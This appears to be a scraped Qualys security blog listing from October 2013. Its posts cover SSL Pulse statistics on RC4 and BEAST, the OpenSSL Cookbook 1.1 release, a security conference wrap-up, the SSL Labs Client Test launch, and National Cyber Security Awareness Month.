ssl-pulse-rc4-oct2013.png


As you can see, the green area is very small; only 7.2% servers do not support RC4. This is not very surprising, as RC4 is one of the most popular ciphers in SSL. Most servers (56.3%) have at least one RC4 suite enabled, but they are not always used. But more than a third of servers (36.5%) actually use RC4 with at least one modern browser. This is the number we need to bring down.

BEAST

This month we stopped requiring server-side mitigation for the BEAST vulnerability. Even though BEAST can still be a problem for some, the impending threat of RC4 means that we must give up on BEAST so that we can start phasing RC4 out.

 

Given that we are not yet penalizing servers that support RC4, the change in our rating means that there is a much higher number of servers that we consider secure:

ssl-pulse-secure-oct2013.png

But, with more than 50% of the servers supporting RC4, the number of secure sites will most definitely fall again in the following months.

0

openssl-cookbook-cover.pngOpenSSL Cookbook is a free ebook based around one chapter of my in-progress book Bulletproof SSL/TLS and PKI. The appendix contains the SSL/TLS Deployment Best Practices document (re-published with permission from Qualys). In total, there's about 50 pages of text that covers the OpenSSL essentials, starting with installation, then key and certificate management, and finally cipher suite configuration.

 

 

The first version of OpenSSL Cookbook was published in May, but now, five months after that release, I've released version 1.1. The changes in this version are as follows:

 

  • Updated SSL/TLS Deployment Best Practices to v1.3. This version brings several significant changes: 1) RC4 is deprecated, 2) the BEAST attack is considered mitigated server-side, 3) Forward Secrecy has been promoted to its own category. There are many other smaller improvements throughout.
  • Reworked the cipher suite configuration example to add Forward Security as a requirement, making the example more useful in practice.
  • Increased coverage of different key types with a discussion of ECDSA keys. Explained when each type is appropriate.
  • Added new text to explain how to generate DSA and ECDSA keys.
  • Explained the challenge password, when generating Certificate Signing Requests.
  • Marked cipher suite configuration keywords that were introduced only in the OpenSSL 1.x branch. This makes it easier to use the text for reference purposes, if you're still running the older, OpenSSL 0.9.x, version.

 

You can get your copy from here.

0

It was a great time all around at the 2013 Qualys Security Conference. There were plenty of bright, energetic security professionals who are deeply engaged in their work to best protect their organizations against advanced threats. The opportunity to take part in so many quality conversations with such security professionals is something that just isn’t possible at the mega cons.

 

At the show, attendees enjoyed a preview of features that are upcoming in the QualysGuard Cloud Platform, as well as insight on QualysGuard’s continuous monitoring capabilities.

 

qsc13-wrapup.jpgAs Elinor Mills covered in her post, Qualys CEO Courtot in QSC Keynote Says Security Should Be Felt, But Not Seen, details on product enhancements were covered, including the increased focus on web application security and expanding the notion of continuous monitoring of the network perimeter.

 

The challenges associated with continuous monitoring - vetting systems for weaknesses and policy posture at enough of a periodicity required to mitigate attack risk - was a significant focus of the conference. One of the highlights included Director, Federal Network Resilience (FNR), U.S. Department of Homeland Security John Streufert keynote, in which he comprehensively detailed DHS’s efforts to boost the security, resilience, and reliability of the nation’s IT and communications infrastructure. That included the continuous monitoring as a service contracts the FNR has put into place for Federal, state, and local governments.

 

Their continuous monitoring efforts also include security dashboards designed to inform and prioritize cyber risk assessments across the government.

 

Mills provided a great overview of Streufert’s talk in her post, DHS Director Streufert: Continuous Monitoring Stops Attacks, Saves Money.

 

Of course, one doesn’t need to be the size of DHS to benefit from the implementation of continuous monitoring. Securosis analyst and president Mike Rothman helped put continuous monitoring in perspective for the rest of organizations, both large and small. In his keynote, he served attendees pragmatic advice on how they can incorporate continuous monitoring by informing attendees what continuous monitoring entails, and strategies detailing how to put continuous monitoring in practice.

 

I provided more details on Rothman’s talk in my post: Focus Continuous Monitoring Efforts Where Breach Will Cause “Blood to Flow in the Streets,” Analyst Says.

 

Securosis also just published their paper on continuous monitoring.

 

In the final keynote of the show, journalist and author Steven Levy reminded everyone what it is we truly owe to hacker culture. In short: just about everything we do today digitally. His talk hailed back to the hacking culture of MIT in the late 50s and and early 60s and up through modern times, including the Internet, and how hacking culture remains a crucial part of the fabric as such companies as Google and Facebook. You can find coverage on his keynote, in the post Author Steven Levy: What We Owe to the Hackers.

 

For security professionals based in Europe, be sure attend Qualys Security Conference 2013 in Paris (14 November), Munich (19 November) and London (22 November).

3

I am delighted to introduce the most recent addition to the SSL Labs web site, the SSL Client Test. For some reason, even though we released sslhaf, our passive client fingerprinting tool, back in 2009, our attention until now remained on server testing only.

 

Then, this year, there was a noticeable increase in the interest in computer security and browser capabilities specifically, which led many of our users to ask us to implemented a client test. We already had a page that displayed the capabilities of well known browsers (linked from the Handshake Simulator section); from there, it was really easy to show what your browser can do.

 

Behind the scenes we rely on sslhaf to extract the entire raw client handshake request and make it available to our application (implemented in Java). From there, we simply disassemble the available information and present it to the user.

 

With the client test, you are now able to see the SSL/TLS capabilities of your preferred browser simply by visiting the test page. And, because the SSL protocol is designed in such a way that clients always tell servers about their capabilities, the best part is that testing does not take much time. In fact, it's pretty much instantaneous.

0
This month is National Cyber Security Awareness Month (NCSAM), marking the tenth year that the U.S. Department of Homeland Security and the National Cyber Security Alliance have brought people and organizations together to discuss ways to stay safe online.ncsam10_logo252_80.jpg

 

More than ever, people around the world are using the Internet for social and business transactions. And we have more devices and “things” - from cars to home security and heating - connected through the Internet today. While it is exciting to see innovative Internet and Web applications that are enriching our lives, unfortunately security is not always top priority with product development, and being connected through the Internet provides the opportunity for some malicious individuals to wreak havoc.

 

That is why October as NCSAM provides an excellent forum for individuals, businesses and government entities to come together to address cyber security. The NCSAM theme of “Our Shared Responsibility” is a powerful message about how education and individual actions can have a collective impact on Internet security.

 

I invite you to take part in NCSAM with me and Qualys as everyone can make a difference. Here are the ways that I plan to take part:

  • Qualys has signed up as a Champion in support of NCSAM. There is no fee for any company to sign up as a Champion; it is simply a great way to build awareness and show your support for NCSAM.
  • Spread the word to STOP. THINK. CONNECT. This simple NCSAM message is powerful to share with everyone - family members, coworkers and children. Help spread the word through company IT education, social media, volunteering at local schools, and by helping family members.
  • As the holidays come, I plan on helping my family members and friends keep their computers patched and updated with the latest software. I also plan on talking to them about using their common sense as they go online. For example, it is important to think carefully about the information that you choose to share online, and with whom you choose to share it.
  • Sharing tips. Throughout this month, my colleagues and I will be sharing tips and best practices for staying secure online.
1 2 3 ... 6 Previous Next

Bookmarked By (1)

Actions